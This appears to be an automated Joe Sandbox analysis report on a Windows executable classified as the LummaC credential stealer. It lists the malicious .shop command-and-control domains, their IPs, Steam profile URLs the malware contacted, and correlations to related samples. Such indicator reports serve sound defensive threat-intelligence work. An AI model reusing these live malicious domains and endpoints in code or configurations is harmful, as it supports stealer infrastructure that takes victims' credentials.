                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=gCRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ffRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;lRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=eRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://offensivedzvju.shop/RegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://performenj.shop/6&RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://vozmeatillu.shop/RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://stogeneratmns.shop/&-7RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampRegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/NRegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.cRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://reinforcenh.shop/d&RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://offensivedzvju.shop/WRegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://avatars.akamai.steamstatic.com/fef49e7fa7e199731RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://store.steampowered.com/legal/RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=eRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://drawzhotdog.shop/RegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://ghostreedmnu.shop/RegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://performenj.shop/piRegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englRegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://performenj.shop/RegAsm.exe, 00000003.00000002.2239685477.0000000000EE3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://gutterydhowi.shop/apiORegAsm.exe, 00000003.00000002.2239685477.0000000000EE9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamaoERegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://steamcommunity.com/profiles/76561199724331900/inventory/RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            		unknown
                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTgRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://performenj.shop/apitRegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://stogeneratmns.shop/apiJRegAsm.exe, 00000003.00000002.2239756790.0000000000F25000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240183729.0000000003278000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/RegAsm.exe, 00000003.00000002.2239609640.0000000000EBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2239685477.0000000000EE3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000003.00000002.2240168674.0000000003270000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://steamcommunity.com/profiles/76561199724331900/badgesRegAsm.exe, 00000003.00000002.2239924746.0000000000F9A000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            104.21.4.136
                            		gutterydhowi.shopUnited States
                            		13335CLOUDFLARENETUStrue
                            172.67.189.2
                            		performenj.shopUnited States
                            		13335CLOUDFLARENETUStrue
                            188.114.97.3
                            		ghostreedmnu.shopEuropean Union
                            		13335CLOUDFLARENETUStrue
                            172.67.162.108
                            		drawzhotdog.shopUnited States
                            		13335CLOUDFLARENETUStrue
                            188.114.96.3
                            		fragnantbui.shopEuropean Union
                            		13335CLOUDFLARENETUStrue
                            104.102.49.254
                            		steamcommunity.comUnited States
                            		16625AKAMAI-ASUSfalse
                            172.67.208.139
                            		reinforcenh.shopUnited States
                            		13335CLOUDFLARENETUStrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1519286
                            Start date and time:2024-09-26 09:57:44 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 15s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:3ZD5tEC5DH.exe
                            renamed because original name is a hash value
                            Original Sample Name:149131a90f99225e6c7e28a06164dd9a.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@4/2@11/7
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 13
                            • Number of non-executed functions: 84
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                            • Excluded IPs from analysis (whitelisted): 93.184.221.240
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: 3ZD5tEC5DH.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            03:58:35API Interceptor4x Sleep call for process: RegAsm.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.21.4.136a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                            file.exeGet hashmaliciousLummaCBrowse
                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                172.67.189.2a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                  file.exeGet hashmaliciousLummaC, VidarBrowse
                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          Suselx1.exeGet hashmaliciousLummaCBrowse
                                                            gkqg90.ps1Get hashmaliciousLummaCBrowse
                                                              Res.ps1Get hashmaliciousLummaCBrowse
                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                  file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                    188.114.97.3HpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                    • www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
                                                                    QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • filetransfer.io/data-package/Ky4pZ0WB/download
                                                                    ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                    • www.1win-moldovia.fun/1g7m/
                                                                    http://www.tiktok758.com/Get hashmaliciousUnknownBrowse
                                                                    • www.tiktok758.com/img/logo.4c830710.svg
                                                                    TRmSF36qQG.exeGet hashmaliciousFormBookBrowse
                                                                    • www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
                                                                    PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                    • www.rtprajalojago.live/2wnz/
                                                                    (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                                                                    • dddotx.shop/Mine/PWS/fre.php
                                                                    QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • filetransfer.io/data-package/DiF66Hbf/download
                                                                    http://easyantrim.pages.dev/id.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                    • easyantrim.pages.dev/id.html
                                                                    QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • filetransfer.io/data-package/13rSMZZi/download

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    gutterydhowi.shopa7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.4.136
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 172.67.132.32
                                                                    bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.132.32
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 172.67.132.32
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 104.21.4.136
                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                    • 172.67.132.32
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 172.67.132.32
                                                                    ACeTKO93e9.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.132.32
                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                    • 104.21.4.136
                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                    • 104.21.4.136
                                                                    steamcommunity.coma7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.102.49.254
                                                                    Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.102.49.254
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 104.102.49.254
                                                                    HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.102.49.254
                                                                    bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.102.49.254
                                                                    HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.102.49.254
                                                                    SecuriteInfo.com.Win64.Malware-gen.15701.20735.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                    • 104.102.49.254
                                                                    SecuriteInfo.com.Win64.Evo-gen.13360.8133.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                    • 104.102.49.254
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 104.102.49.254
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 104.102.49.254
                                                                    performenj.shopa7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.189.2
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 104.21.51.224
                                                                    HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.51.224
                                                                    bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.51.224
                                                                    HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                                                    • 104.21.51.224
                                                                    SecuriteInfo.com.Win64.Malware-gen.15701.20735.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                                    • 104.21.51.224
                                                                    SecuriteInfo.com.Win64.Evo-gen.13360.8133.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                    • 104.21.51.224
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 172.67.189.2
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 172.67.189.2
                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                    • 172.67.189.2
                                                                    fragnantbui.shopa7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                    • 188.114.97.3
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 188.114.97.3
                                                                    bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                                    • 188.114.96.3
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 188.114.97.3
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 188.114.97.3
                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                    • 188.114.96.3
                                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                    • 188.114.97.3
                                                                    ACeTKO93e9.exeGet hashmaliciousLummaCBrowse
                                                                    • 188.114.97.3
                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                    • 188.114.96.3
                                                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                    • 188.114.97.3

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUSHpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.17.90
                                                                    gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.70.136
                                                                    a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.58.182
                                                                    iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                    • 104.21.37.97
                                                                    Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                    • 104.26.13.205
                                                                    QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.134.233
                                                                    64.exeGet hashmaliciousUnknownBrowse
                                                                    • 162.159.61.3
                                                                    CLOUDFLARENETUSHpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.17.90
                                                                    gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.70.136
                                                                    a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.58.182
                                                                    iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                    • 104.21.37.97
                                                                    Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                    • 104.26.13.205
                                                                    QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.134.233
                                                                    64.exeGet hashmaliciousUnknownBrowse
                                                                    • 162.159.61.3
                                                                    CLOUDFLARENETUSHpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.17.90
                                                                    gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.70.136
                                                                    a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.58.182
                                                                    iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                    • 104.21.37.97
                                                                    Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                    • 104.26.13.205
                                                                    QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.134.233
                                                                    64.exeGet hashmaliciousUnknownBrowse
                                                                    • 162.159.61.3
                                                                    CLOUDFLARENETUSHpCQgSai4e.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.17.90
                                                                    gvyO903Xmm.exeGet hashmaliciousFormBookBrowse
                                                                    • 104.21.70.136
                                                                    a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.58.182
                                                                    iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                    • 104.21.37.97
                                                                    Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                    • 104.26.13.205
                                                                    QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                    • 188.114.96.3
                                                                    450230549.exeGet hashmaliciousAgentTeslaBrowse
                                                                    • 162.159.134.233
                                                                    64.exeGet hashmaliciousUnknownBrowse
                                                                    • 162.159.61.3

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    a0e9f5d64349fb13191bc781f81f42e1a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139
                                                                    iq2HxA0SLw.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139
                                                                    https://tiktoksc.tv/wapGet hashmaliciousUnknownBrowse
                                                                    • 104.21.4.136
                                                                    • 172.67.189.2
                                                                    • 188.114.97.3
                                                                    • 172.67.162.108
                                                                    • 188.114.96.3
                                                                    • 104.102.49.254
                                                                    • 172.67.208.139
